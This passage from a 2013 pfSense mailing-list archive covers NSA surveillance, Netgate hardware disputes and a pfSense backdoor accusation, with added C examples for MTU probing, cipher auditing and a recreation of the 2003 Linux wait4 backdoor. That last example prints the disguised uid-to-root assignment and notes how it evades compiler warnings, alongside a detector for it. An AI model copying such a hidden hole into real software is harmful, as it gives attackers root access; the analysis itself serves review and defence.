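            hi = mid - 1;
    }
    return lo;
}

struct pmtu_report { int payload, mtu, mss, at_minimum; };

/* Full diagnosis: implied MTU, a safe MSS clamp, and whether the path is
 * pinned at the IPv6 minimum (typical of an undersized tunnel hop). */
int diagnose(probe_fn probe, void *ctx, struct pmtu_report *r)
{
    int largest = find_largest_payload(probe, ctx, 0, 9000);
    if (largest < 0)
        return -1;
    r->payload = largest;
    r->mtu = packet_size(largest);
    r->mss = tcp_mss_for(r->mtu);
    r->at_minimum = (r->mtu == IPV6_MIN_MTU);
    return 0;
}

int main(void)
{
    int mtu = 1280;  /* constructed path MTU, matching the thread's numbers */
    struct pmtu_report r;
    if (diagnose(simulated_probe, &mtu, &r) == 0)
        printf("largest payload %d, implied MTU %d, clamp MSS to %d%s\n",
               r.payload, r.mtu, r.mss, r.at_minimum ? " (IPv6 minimum)" : "");
    /* Against a live host, a probe would run "ping6 -c 1 -s <payload> host"
     * and return (exit status == 0). */
    return 0;
}
```

A path that lands exactly on 1280 is the interesting result: it usually means some hop is a tunnel that cannot carry more, and TCP sessions through it will stall on large segments unless the sender honours Packet Too Big or the MSS is clamped to 1220.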
Re: [pfSense] [liberationtech] NSA Laughs at PCs, Prefers Hacking Routers and Switches
On Sep 5, 2013, at 7:57 AM, Jim Pingle li...@pingle.org wrote: But it doesn't matter if the vendors issue a patch, people actually have to install the update to fix it, and odds are high that typical end users have no idea that is even possible or something they have to do. This speaks to a service that keeps the software updated.
Re: [pfSense] [liberationtech] NSA Laughs at PCs, Prefers Hacking Routers and Switches
Read ‘em and weep: http://www.nytimes.com/2013/09/06/us/nsa-foils-much-internet-encryption.html?_r=0 My take is that most places don’t enable PFS (because it’s “hard”) in IPSec. In theory, Transport Layer Security (TLS) can choose appropriate ciphers since SSLv3, but in everyday practice many implementations have refused to offer PFS or only provide it with very low encryption grade. http://www.ietf.org/mail-archive/web/tls/current/msg02134.html I don’t know the situation on pfSense (I’ve not gone to look, as I’m elbows deep in an IPv6 IPsec issue atm.) In theory, OpenSSL supports perfect forward secrecy using elliptic curve Diffie–Hellman since version 1.0. Do we set “enable-ec_nistp_64_gcc_128” on pfSense? Do we enable the DHE-RSA-AES128-SHA cipher suite? How about ECDHE-RSA-AES128-SHA? Do we build the 64-bit optimized version for 64-bit images? http://vincent.bernat.im/en/blog/2011-ssl-perfect-forward-secrecy.html Anyway, the ‘evidence’ is that there is some fundamental weakness in DH, since the NSA itself recommends EC crypto rather than DH in their “Suite B” offering. http://www.nsa.gov/ia/programs/suiteb_cryptography/ One would think that pfSense would follow suit.
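A way to check the cipher-suite questions above against what a given OpenSSL actually offers, as an added example (not pfSense's code or the thread's): parse the lines that `openssl ciphers -v '<cipher string>'` prints and flag every suite whose Kx= field is not an ephemeral (EC)DH exchange. The SAMPLE lines are constructed in that command's layout; the two PFS suites named in the message appear alongside static-RSA suites for contrast. Only the Kx= field is interpreted, so real output piped through it works unchanged.

```c
#include <stdio.h>
#include <string.h>

/* Added example: audit `openssl ciphers -v` output for forward secrecy.
 * Only the Kx= field of each line is interpreted. */

/* 1 if Kx= names an ephemeral exchange (ECDH*, DH*, including the PSK
 * variants) or a TLS 1.3 suite (Kx=any); 0 if static (RSA, SRP, ...);
 * -1 if the line has no Kx= field at all. */
int line_forward_secret(const char *line)
{
    const char *kx = strstr(line, "Kx=");
    if (!kx)
        return -1;
    kx += 3;
    if (strncmp(kx, "ECDH", 4) == 0 || strncmp(kx, "DH", 2) == 0 ||
        strncmp(kx, "any", 3) == 0)
        return 1;
    return 0;
}

/* Copy the suite name (first whitespace-delimited token) into out. */
void suite_name(const char *line, char *out, size_t outsz)
{
    size_t n = strcspn(line, " \t");
    if (n >= outsz)
        n = outsz - 1;
    memcpy(out, line, n);
    out[n] = '\0';
}

/* Walk a newline-separated buffer; returns how many suites lack forward
 * secrecy and writes their names, comma-separated, into bad. */
int audit_ciphers(const char *text, char *bad, size_t badsz)
{
    int count = 0;
    const char *p = text;
    bad[0] = '\0';
    while (*p) {
        const char *nl = strchr(p, '\n');
        const char *next = nl ? nl + 1 : p + strlen(p);
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[256], name[64];
        if (len >= sizeof line)
            len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        if (line_forward_secret(line) == 0) {
            suite_name(line, name, sizeof name);
            if (count++ > 0)
                strncat(bad, ",", badsz - strlen(bad) - 1);
            strncat(bad, name, badsz - strlen(bad) - 1);
        }
        p = next;
    }
    return count;
}

/* Constructed sample in the layout `openssl ciphers -v` prints: the two
 * suites asked about in the message, a TLS 1.3 suite, and two static-RSA
 * suites that carry no forward secrecy. */
static const char SAMPLE[] =
    "ECDHE-RSA-AES128-SHA    TLSv1   Kx=ECDH  Au=RSA  Enc=AES(128)    Mac=SHA1\n"
    "DHE-RSA-AES128-SHA      SSLv3   Kx=DH    Au=RSA  Enc=AES(128)    Mac=SHA1\n"
    "TLS_AES_256_GCM_SHA384  TLSv1.3 Kx=any   Au=any  Enc=AESGCM(256) Mac=AEAD\n"
    "AES128-SHA              SSLv3   Kx=RSA   Au=RSA  Enc=AES(128)    Mac=SHA1\n"
    "DES-CBC3-SHA            SSLv3   Kx=RSA   Au=RSA  Enc=3DES(168)   Mac=SHA1\n";

int main(void)
{
    char bad[256];
    int n = audit_ciphers(SAMPLE, bad, sizeof bad);
    printf("%d suite(s) without forward secrecy: %s\n", n, bad);
    return n ? 1 : 0;
}
```

To audit a real configuration, feed it the output of `openssl ciphers -v` with the exact cipher string the server uses; a clean result is an empty list. A cipher string such as `ECDHE:DHE:!aNULL:!eNULL:!MD5` restricts OpenSSL to ephemeral exchanges, which is the configuration the message is asking whether pfSense ships.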
Re: [pfSense] [liberationtech] NSA Laughs at PCs, Prefers Hacking Routers and Switches
On Sep 5, 2013, at 12:08 PM, Mark Tinka mark.ti...@seacom.mu wrote: On Thursday, September 05, 2013 04:55:31 PM Jim Pingle wrote: I'm not opposed to auto-update if it's done securely and opt-in. Especially if you can schedule the time it takes place (e.g. specific day, specific time frame). The problem with updating router/switch software, as you know, is that you can't guarantee that what was working before won't be broken after the update. In addition to the downtime (large routers and switches can take several, several minutes to boot), a lot of service providers won't update for this reason. Wait, wait. Show me, again where pfSense is used in a non-trivial service provider environment in a position where it actually routes traffic. And show me again where auto-update was *required*, rather than an option? That said, the vendors tend to issue workarounds that don't require software updates, and as such, reboots. This is not always the case, and in some scenarios, a software update is your only option. Vendors have attempted in-service updates (ISSU and friends), but this is not very practical as of now, and tends to work less often than not. It’s all doable. (It’s just software.) but it’s decidedly non-trivial. Monitoring your infrastructure with simple tools like RANCID is an effective and quick way to know what has changed on your network, so you can investigate any potential breaches. Unlike laptops and desktops, the latest software for routers and switches isn't always the greatest :-). if by “isn’t always” you mean “occasionally isn’t”, fine. If you mean “often isn’t”, then I fundamentally disagree. jim
Re: [pfSense] [liberationtech] NSA Laughs at PCs, Prefers Hacking Routers and Switches
On Sep 5, 2013, at 6:49 PM, Bob Gustafson bob...@rcn.com wrote: The new Apple operating system = Mavericks or iOS 7 will have an autoupdate feature. Which can be disabled.
Re: [pfSense] [liberationtech] NSA Laughs at PCs, Prefers Hacking Routers and Switches
(getting back to the actual subject…) The actual documents are worthy of a look. For example, at http://www.nytimes.com/interactive/2013/09/05/us/documents-reveal-nsa-campaign-against-encryption.html?ref=us&pagewanted=all (Goal for CY2013): “Complete enabling for [redacted] encryption chips used in Virtual Private Network and Web encryption devices”. With the following note: “Large Internet companies use dedicated hardware to scramble traffic before it is sent. In 2013, the agency planned to be able to decode traffic that was encoded by one of these two encryption chips, either by working with the manufacturers of the chips to insert back doors or by exploiting a security flaw in the chips' design.” Another interesting goal: “Shape worldwide commercial cryptography marketplace to make it more tractable to advanced cryptanalytic capabilities being developed by NSA/CSS.” Elsewhere, “enabling access and exploiting systems of interest and inserting vulnerabilities”. These are side-channel attacks. I see no other reference to cryptanalysis, so I would take this statement at face value: NSA has techniques for doing cryptanalysis on certain algorithms/protocols out there, but not all, and they would like to steer public cryptography into areas for which they have attacks. This makes any NSA recommendation *extremely* suspect. As previously reported, and as far as I can see, the big push NSA is making these days is toward ECC with particular curves. Makes you wonder, and makes me willing to reverse my previous position of Suite B library as “best practices”. NSA has two separate roles: Protect American communications, and break into the communications of adversaries. Given the revelations of the past 60 days, one of these things is true: (a) the latter part of the mission has come to dominate the former; or (b) the current definition of an adversary has become so broad as to include pretty much everyone. Jim p.s. 
It may be of interest that both “Bullrun”, and “Manassas”, the program it replaced, are names of battles during the (US) Civil War. Fun reading: http://www.slate.com/blogs/the_slatest/2013/09/06/nsa_bullrun_manassas_why_is_the_nsa_naming_its_covert_programs_after_civil.html
Re: [pfSense] PBI packaging: BGPd vs OSPFd
On Sep 15, 2013, at 11:50 AM, Adam Thompson athom...@athompso.net wrote: Is BGPd in Quagga likely to be a huge PITA? If not, I'll probably take a stab at integrating it into the GUI. If I can figure out how to build packages, anyway. (I'd prefer OpenOSPFd instead of Quagga, but that seems like a dead duck in pfSense now.) I strongly prefer Quagga over OpenBSD’s “solution”, but mostly because ISC has gotten behind it. https://github.com/opensourcerouting/quagga I do now need a more-capable router than what pfSense gives me, in the sense that I need to be able to run EGPs and IGPs simultaneously. Perhaps we need a separate ‘pro routing’ product/project that eliminates a lot of the “home network” functionality that doesn’t belong on a box that core to forwarding packets. Jim -Adam Jim Pingle li...@pingle.org wrote: On 9/15/2013 11:58 AM, Adam Thompson wrote: Reading the release notes for 2.1 reminded me of something... shouldn't the use of PBI packaging now automagically resolve the conflicts between OpenBGPd/OpenOSPFd and Quagga? Somewhat. The actual calls to the binaries in their respective packages use the links in /usr/local/(s)bin/ so they still conflict since the links from one PBI will clobber the links from another. If the packages were adjusted to call the binaries from their isolated PBI dirs, then it may be OK, though since the actual binary names are the same (e.g. bgpd) some things such as the service status may not reflect the right status. Jim
Re: [pfSense] PBI packaging: BGPd vs OSPFd
On Sep 15, 2013, at 12:30 PM, Jim Pingle li...@pingle.org wrote: On 9/15/2013 1:17 PM, Adam Thompson wrote: If we mix Quagga and BIRD, don't we wind up with fragmentation problems very similar to what we have now? No because as far as I can see BIRD's binaries are bird, birdc, and birdcl. It doesn't have a dedicated daemon process for each type of routing. I want to like bird, I really do. But it’s Quagga that has gotten all the runtime in real networks, and attention to its codebase lately. jim
Re: [pfSense] 2.1 on WRAP
On Sep 20, 2013, at 6:45 AM, Odette Nsaka odette.ns...@libero.it wrote: Does somebody know other reliable and cheap embedded platforms running pfSense with no problem? http://store.netgate.com/Netgate-FW-525B-P1919C83.aspx
Re: [pfSense] 2.1 on WRAP
On Sep 20, 2013, at 9:09 AM, Bill Arlofski waa-pfse...@revpol.com wrote: To be clear, when I said non-ALIX, I meant to say Netgate FW-7535H with 2GB (maybe 4GB, not sure right now) RAM. If you put 4GB in it, you're a magician.
Re: [pfSense] NETGATE FW-7535 pfSense 2.0.2-RELEASE OpenVPN Data Corruption
Netgate sold you a FW-7535 with a CF card and either 1MB or 2MB of ram, originally. You changed the ram and installed an SSD, reloaded pfSense, and now you want to complain that Netgate couldn’t… what, exactly? There are thousands of FW-75xx systems in the world, happily running pfSense. The problems we have tend to develop when people assume they know better about what the machine can support, and start treating it like a garden-variety PC. It’s not. It shares the Intel architecture, sure, but it’s an embedded system, with attendant requirements (mostly environmental) that no PC would deal with for long. I actually know that the replacement unit you received was running (“in service”) between two fiber connections. The one you received was one of the last remaining 7535s(*), in something like mint condition, which we could lay our hands on. It was pulled from a live environment, put back through the factory load process, and shipped to you. It goes without saying that there was no “packet corruption” evident when it was last in-service here. I, for one, would be curious to know if the ‘corruption’ which you accuse recurs with the original, as-shipped configuration. Jim (*) Another choice was to take the 7535 we have running Asterisk (FreePBX), and refurbish it to factory fresh. On Sep 29, 2013, at 7:45 AM, master8...@aol.com wrote: I finally was able to receive an advanced replacement from Netgate a few weeks ago. I swapped it out leaving my old install intact and the problem disappeared on the new device. After all the installs with the various Netgate FW models over the years (not the m1n1wall, those have been awesome but are too outdated for me to be using on 100meg+ internet), Their reliability has been lacking and the issues that arise are always hard to diagnose and prove (freezing, no response situations, corrupting packets). I think I am just going to give up a few Ethernet ports that I don't end up using anyways and start building my own. 
Jonathon On 8/20/2013 11:08 AM, master8...@aol.com wrote: I switched out the memory and the SSD, reinstalled pfsense, and after a few weeks of operation, VPN traffic started corrupting again. A soft reset doesn't fix it. A hard reset (by pulling the power cord for a few seconds) does. I tried contacting Netgate and didn't receive a response. Does anyone know what could be going on here? Thanks, Jonathon On 7/26/2013 9:04 AM, master8...@aol.com wrote: Scanned the memory with memtest this morning and scanned the Intel SSD as well, it's all fine. I did stumble across something that fixes it though. Pulling the power cord for a few seconds. The act of removing power from my Netgate FW-7535 caused everything to start working. I probably soft reset it from the console 10 times and kept getting corrupted OpenVPN connections until I actually pulled power from the thing. I am starting to lean towards something on it's motherboard being defective. I will switch out the memory and SSD in a few days just to make sure it's not them. Thanks, Jonathon On 7/25/2013 6:25 PM, Bob Gustafson wrote: On 07/25/2013 04:59 PM, master8...@aol.com wrote: The last few months I have been having issues with OpenVPN connections from my road warriors. It appears that most of the traffic crossing the link is corrupted. I can't use remote desktop, it always says because of an error in data encryption, the session will end. I can't use the company intranet, it always displays the pages corrupted or doesn't load them at all. What do I mean by corrupted? See how it butchered the page load of the pfSense web admin interface. http://imgur.com/3B6EAAT This doesn't look too bad. I am assuming that you have sliced out the data for security purposes - or is that the corruption? All of this obvious data corruption and not a single peep in the logs. Nothing, nowhere. I have 20 installs and this is the only one that has ever given me an issue like this. Does anyone have any ideas? 
Are you saying 20 installs on different hardware, or 20 installs sequentially over several months/versions on the same box. If 20 on separate boxes, I would do a memory test on the failing box. Bob G Thanks, Jonathon
Re: [pfSense] NETGATE FW-7535 pfSense 2.0.2-RELEASE OpenVPN Data Corruption
Yudhvir, I’m just grumpy, because of messages like the below (OP, not you), and threads like this: http://forum.pfsense.org/index.php/topic,66684.15.html Note again that it’s someone who decided to put their own SSD in the box, loaded their own version of pfSense, then blew their foot off when they upgraded to 2.1. First, netgate does NOT have “it’s own version of pfSense”. Yes, we re-brand the GUI, or rather, we have the pfSense team do it. Costs us money, every month. (Money we’ve been happy to pay every month since sometime in 2006. Money which directly supports the pfSense project.) There is a version of pfSense 2.0.3 (specifically, 2.0.3p1) which specifically adds support for the Realtek devices on the Jetway system we sell. When we made this release, it was pushed back through the build process by Jim Pingle. Restated: it didn’t come directly from Netgate personnel. Second, most people should be aware by now that Jamie and I (the ‘owners’ of Netgate) are also (with cmb) co-owners of the company behind pfSense. This has been true for a bit over a year now. I am involved with both companies, both in terms of day to day operations and things more strategic. cmb’s office is next door to mine. Third, most people should have noted that Netgate’s version 2.1 didn’t ship simultaneous with the ‘stock’ pfSense. There are reasons, mostly related to a lack of testing by the pfSense crew, and my desire to drive any changes for same back through the pfSense side. As was discovered late in the thread referenced above, the ‘name’ of the disk changes, assuming a HD is present. When we build these (once we did), the settings were updated (first by hand, and now with a custom BIOS config) the CMOS is set such that the upgrade to 2.1 will correctly complete. We take a lot of time and care releasing systems into the world. We develop and test specific processes for the people building systems to follow, such that we *know* what is in the field. 
We spent a long time with people hammering the sales side of Netgate for a SSD solution before I allowed one to ship. There are many reasons for this, including a distinct lack of reliable SSDs, lack of TRIM support in the underlying FreeBSD kernel, lack of a repeatable high-speed loading solution, some insight into what 2.1 would bring, etc. So when people decide they know better, make a mess, and then (worse) occasionally demand a refund “because the system doesn’t work”, it raises my ire. Sorry for allowing that to show through. I’m doing my best to keep the codebases from diverging, but I keep hearing echoes in the community that Netgate has all but forked pfSense. If there was one company most unlikely to fork pfSense, it’s Netgate. Jim On Sep 30, 2013, at 10:56 AM, Mehma Sarja mehmasa...@gmail.com wrote: Jim, Netgate has a solid reputation for quality stuff and I happen to be a happy customer. On occasion when I've called with technical questions, your support has been very good. Enough for me to recommend your company and products... and support. Therefore, I find your starting tone a bit defensive. The customer in question obviously had the need to make the changes he did. And it messed up the machine. We all get that. You do not need to point that out. Yudhvir On Mon, Sep 30, 2013 at 8:23 AM, Jim Thompson j...@netgate.com wrote: Netgate sold you a FW-7535 with a CF card and either 1MB or 2MB of ram, originally. You changed the ram and installed an SSD, reloaded pfSense, and now you want to complain that Netgate couldn’t… what, exactly? There are thousands of FW-75xx systems in the world, happily running pfSense. The problems we have tend to develop when people assume they know better about what the machine can support, and start treating it like a garden-variety PC. It’s not. It shares the Intel architecture, sure, but it’s an embedded system, with attendant requirements (mostly environmental) that no PC would deal with for long. 
I actually know that the replacement unit you received was running (“in service”) between two fiber connections. The one you received was one of the last remaining 7535s(*), in something like mint condition, which we could lay our hands on. It was pulled from a live environment, put back through the factory load process, and shipped to you. It goes without saying that there was no “packet corruption” evident when it was last in-service here. I, for one, would be curious to know if the ‘corruption’ which you accuse recurs with the original, as-shipped configuration. Jim (*) Another choice was to take the 7535 we have running Asterisk (FreePBX), and refurbish it to factory fresh. On Sep 29, 2013, at 7:45 AM, master8...@aol.com wrote: I finally was able to receive an advanced replacement from Netgate a few weeks ago. I swapped it out leaving my old install intact
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
(TIC mode: on) I think it’s obvious that: - ESF is a front for the NSA - the acquisition which closed last year was really just about gaining control of a critical component of Internet infrastructure. - the delays getting 2.1 out the door were exclusively about getting some last-minute backdoor code installed. AYBAB2U, baby! (TIC mode: off) On Oct 9, 2013, at 5:56 PM, Thinker Rix thinke...@rocketmail.com wrote: On 2013-10-09 18:20, Paul Kunicki wrote: I think that in light of the recent news of the NSA coercing various organizations to provide them with means to eavesdrop this message has merit and deserves response Exactly, Paul, you got my point! although I doubt the NSA really needs cooperation from these guys. Does anyone else care to comment? @your doubts about the NSA/FBI/put the name of your government's surveillance institution here bothering with smaller companies such as Electric Sheep Fencing LLC (formerly BSD perimeter) and their niche product pfSense: Please take these 2 things into account: 1. Recently they forced the small encrypted-email-service Lavabit to comply with them (hand out their SSL-masterkeys and install a black-box at their premises). Lavabit did not agree - and they shut him down. https://en.wikipedia.org/wiki/Lavabit. Officially they wanted to force Lavabit to just hand out Edward Snowden's emails (bad enough), but in reality they wanted to gain access to all emails of Lavabit by receiving the SSL masterkeys and by placing the blackbox at their premises, which rendered the whole service useless. 2. Routers/Gateways/Firewalls are highly interesting for big brother. Read e.g. this article NSA Laughs at PCs, Prefers Hacking Routers and Switches (https://mailman.stanford.edu/pipermail/liberationtech/2013-September/011287.html) So, combining those 2 facts - the fact that the NSA/FBI/etc. 
prefer to infiltrate routers with the fact that they very well bother knocking the doors of small businesses with niche products, I guess my question is quite legitimate! Greetings Thinker Rix
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 6:38 PM, Thinker Rix thinke...@rocketmail.com wrote: My main question was not if the code includes bad things, but if the company behind pfSense has been approached (yet) by authorities to comply with their Orwellian global police state phantasy. already answered. Twice.
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 6:46 PM, David Burgess apt@gmail.com wrote: On Wed, Oct 9, 2013 at 10:38 AM, Jim Thompson j...@netgate.com wrote: So asking the question is stupid(*), because a lie is indistinguishable from the truth. I disagree on that point. Even if one is sure to get a no answer, regardless of the truth, it is still useful to ask the question for at least two reasons I can think of: 1. To get the response on record. The responders can be held accountable should it ever come out they knowingly lied. 2. To examine the response for credibility. A simple yes or no answer might not yield much, but such is rarely the case. If the answer is delayed, unclear, couched in a bunch of rhetoric or handwaving, delayed or avoided, then any or all of these things will be taken into account by those asking the question or observing the response. This is a principle that is understood by courts of law, psychologists, interrogators, and people of intuition. IMO, this bullshit thread only serves to assist those asking the question in stroking their own ego. It doesn’t contribute anything to the project.
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 6:56 PM, Eugen Leitl eu...@leitl.org wrote: On Wed, Oct 09, 2013 at 06:50:53PM +0200, Jim Thompson wrote: IMO, this bullshit thread only serves to assist those asking the question in stroking their own ego. Sorry, this is not BS. The situation has changed, and we have to adapt. The situation did not change with the Snowden revelations. Anyone following along has known what was going on for at least the last decade. The only thing that has changed is that now outrage has become popular. The New York Times’ James Risen and Laura Poitras penned an article a couple weeks ago titled ‘NSA Gathers Data on Social Connections of U.S. Citizens” in which they make the claims based on documents leaked by “Edward Snowden”. “… the National Security Agency has been exploiting its huge collections of data to create sophisticated graphs of some Americans’ social connections that can identify their associates, their locations at certain times, their traveling companions and other personal information, according to newly disclosed documents and interviews with officials… … according to documents provided by Edward J. Snowden… … The new disclosures add to the growing body of knowledge in recent months about the N.S.A.’s access to and use of private information concerning Americans” New York Times See: http://www.nytimes.com/2013/09/29/us/nsa-examines-social-networks-of-us-citizens.html?pagewanted=all William E. Binney (perhaps you should google him) was speaking directly to Laura Poitras when he said these words slightly over a year ago: “The purpose is to be able to monitor what people are doing. You build social networks for everybody that then turns into the graph then you index all that data to the graph which means you can then pull out a “community” with an outline of the life of everyone in the community. And if you carried it over time from 2001 up you have 10 years of their life you can lay out in a timeline. That involves anybody in the country” William E. 
Binney, Aug. 2012, speaking to Laura Poitras in HER documentary The Program http://www.nytimes.com/2012/08/23/opinion/the-national-security-agencys-domestic-spying-program.html?_r=0 Do you think she forgot this interview while she was writing an article in the New York Times last month that she was told this “groundbreaking” revelation long ago? Because she never mentions Binney in her new article. Why? Seriously, ask yourself why. She also doesn’t mention key things like “Stellar Wind” or NarusInsight. These are real programs. For all we know, Pyramid is nothing more than a Powerpoint deck created for a psyop purposes. Maybe it’s real, and maybe this is all a smokescreen for something else. How many of you people now questioning pfSense understand that Edward Snowden despised classified leaks in back in 2009, and that he was not always the champion of transparency that he has apparently become. ArsTechnica published IRC chats where he railed against a New York Times story about the U.S. rejecting an Israeli request for aid to attack an Iranian nuclear site and the United States' covert efforts to sabotage Iran's nuclear program. Are they TRYING to start a war? Jesus christ. they're like wikileaks, he said in the chat. they're just reporting, dude, said another user. moreover, who the fuck are the anonymous sources telling them this? he said. those people should be shot in the balls. Snowden, in the chat, also criticized reporting on classified information: is it unethical to report on the government's intrigue? asked a user in the chat. VIOLATING NATIONAL SECURITY? no. he responded. meh. national security. responded the user. Um, YS.that shit is classified for a reason, he said. it's not because oh we hope our citizens don't find out. it's because this shit won't work if iran knows what we're doing. I am so angry right now. This is completely unbelievable, Snowden said. 
http://arstechnica.com/tech-policy/2013/06/exclusive-in-2009-ed-snowden-said-leakers-should-be-shot-then-he-became-one/3/ It doesn’t contribute anything to the project. It clarifies a few things. Please don't knee-jerk about it, this is not going to improve things in any way. So “be a pussy” is your answer to handle this? jim
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 7:03 PM, Thinker Rix thinke...@rocketmail.com wrote: Hello Jim! Thank you for your answer. On 2013-10-09 19:38, Jim Thompson wrote: No, the NSA hasn’t approached us about pfSense, or adding a “back door”, or anything similar. Nor has anyone else. Do you work for Electric Sheep Fencing LLC, i.e. is this the official answer of the company to my question? There are three individuals that own ESF, and can speak for the company. Chris Buechler Jamie Thompson (my wife) Me. how official do you want an answer to be?
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 7:13 PM, Thinker Rix thinke...@rocketmail.com wrote: Hello Jim! On 2013-10-09 19:50, Jim Thompson wrote: IMO, this bullshit thread only serves to assist those asking the question in stroking their own ego. This is already the second time that you insult me indirectly. It’s amusing that you don’t understand that you threw the first stone here. May I ask again if you are a staff member of Electric Sheep Fencing LLC? Staff members get paid. I’m a co-owner, and have never taken a dime from ESF (or BSDP). jim
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 9, 2013, at 7:36 PM, Thinker Rix thinke...@rocketmail.com wrote:

> On 2013-10-09 20:04, Walter Parker wrote:
>> About that made in the USA thing, the NSA has deals with overseas companies as well... Plus, the GCHQ and several other foreign spy agencies have done similar things, so if you start asking, you discover that the major governments are trying to do this and have succeeded more often than we would like.
>
> Yes, it is horrifying.
>
>> Also, the whole We have to ask to ask the question to get the denial on record only matters for the government or people with lots of money. The Government can sue you/arrest you for a lie, but do you have enough money to pay for lawsuits against a company? Most lawyers want money upfront unless you have a clear suit against a company with lots of money. When was the last (or even first time) that a company was sued and lost to a private party for something like this, outside of class action lawsuits?
>
> I do not want to sue or otherwise harm anybody. I only asked a very simple question and now read the answers. Very interesting answers, I think.

Not interesting, just simple ego stroking.

As for those who want to read the source to find bugs …

Back in 2003 Linux used a system called BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. Every change to the master code would come with a short explanation, which always included a pointer to the record of its approval.

But some people didn’t like BitKeeper, so a second copy of the source code was kept so that developers could get the code via another code system called CVS. The CVS copy of the code was a direct clone of the primary BitKeeper copy.

But on Nov. 5, 2003, Larry McVoy noticed that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in (electronically) to the CVS server and inserted this change.

What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code:

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;

[Exercise for readers who know the C programming language: What is unusual about this code? Answer appears below.]

A casual reading by anyone less than expert would interpret this as innocuous error-checking code to make wait4 return an error code when wait4 was called in a certain way that was forbidden by the documentation. But a really careful (and somewhat) expert reader would notice that, near the end of the first line, it said “= 0” rather than “== 0”. The normal thing to write in code like this is “== 0”, which tests whether the user ID of the currently running code (current->uid) is equal to zero, without modifying the user ID. But what actually appears is “= 0”, which has the effect of setting the user ID to zero.

Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … it’s a classic backdoor.

This is a very clever piece of work. It looks like innocuous error checking, but it’s really a back door. And it was slipped into the code outside the normal approval process, to avoid any possibility that the approval process would notice what was up.

Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack. Unless somebody confesses, or a smoking-gun document turns up, we’ll never know.

We still don't have a report on the kernel.org hack of 2011. Why not?

Many people say, calm down, it's git, they can’t have inserted backdoors etc without messing up the git history/changelog/hashes/whatever. But what if git was modified and backdoored previously to hide some objects/changes? How would such an attack work?

Let's say you discover a problem in git, which allows you to omit changesets in its output. How would that work to backdoor the kernel? Older versions of git would tell you the hashes were wrong. Implementations of git in other languages would tell you the hashes were wrong. Manually checking would tell
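The two-line change quoted above, recreated as an added, self-contained C illustration (this is not code from the message or from the Linux kernel): a stand-in `struct task` for the kernel's `current`, the check in its backdoored and its intended form, and a small review aid that counts lone `=` characters inside `if` conditions, which is the pattern a reviewer or compiler warning would need to catch. The `__WALL`/`__WCLONE` values are the Linux ones; the sample source lines are constructed for the demo.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

/* Flag values as defined in Linux's wait.h; any two distinct bits would do here. */
#define __WALL   0x40000000u
#define __WCLONE 0x80000000u

/* Stand-in for the kernel task structure: only the field the backdoor touches. */
struct task { unsigned int uid; };

/*
 * The check as it appeared in the altered CVS copy. The second operand is an
 * assignment: (current->uid = 0) evaluates to 0, so the whole condition is
 * false, no error is ever returned, and the caller's uid has silently become
 * 0 (root). The extra parentheses around the assignment also silence GCC's
 * -Wparentheses "assignment used as truth value" warning.
 */
int wait4_check_backdoored(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE | __WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* What the same lines mean when written as the error check they imitate. */
int wait4_check_intended(const struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE | __WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

/*
 * Review aid: count single '=' characters inside the parenthesised condition
 * of every "if (" in src. Deliberately crude (no handling of strings or
 * comments); any '=' that is not part of ==, !=, <= or >= is reported.
 */
int count_assignments_in_if_conditions(const char *src)
{
    int hits = 0;
    const char *p = src;
    while ((p = strstr(p, "if")) != NULL) {
        const char *q = p + 2;
        while (*q == ' ' || *q == '\t')
            q++;
        if (*q != '(') { p = q; continue; }   /* not an if-statement */
        int depth = 0;
        for (; *q; q++) {
            if (*q == '(') {
                depth++;
            } else if (*q == ')') {
                if (--depth == 0)
                    break;                    /* end of the condition */
            } else if (*q == '=') {
                char prev = q[-1];
                if (q[1] == '=') { q++; continue; }              /* == */
                if (prev == '!' || prev == '<' || prev == '>' || prev == '=')
                    continue;                                    /* != <= >= */
                hits++;
            }
        }
        p = q;
    }
    return hits;
}

/* Constructed sample lines, mirroring the 2003 change and its honest twin. */
static const char BACKDOORED_LINE[] =
    "if ((options == (__WCLONE|__WALL)) && (current->uid = 0))";
static const char INTENDED_LINE[] =
    "if ((options == (__WCLONE|__WALL)) && (current->uid == 0))";

int main(void)
{
    struct task t = { 1000 };
    int rv = wait4_check_backdoored(&t, __WCLONE | __WALL);
    printf("backdoored: retval=%d uid=%u\n", rv, t.uid);      /* retval=0 uid=0 */

    struct task u = { 1000 };
    rv = wait4_check_intended(&u, __WCLONE | __WALL);
    printf("intended:   retval=%d uid=%u\n", rv, u.uid);      /* retval=0 uid=1000 */

    printf("lone '=' in if-conditions: backdoored=%d intended=%d\n",
           count_assignments_in_if_conditions(BACKDOORED_LINE),
           count_assignments_in_if_conditions(INTENDED_LINE));  /* 1 and 0 */
    return 0;
}
```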
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
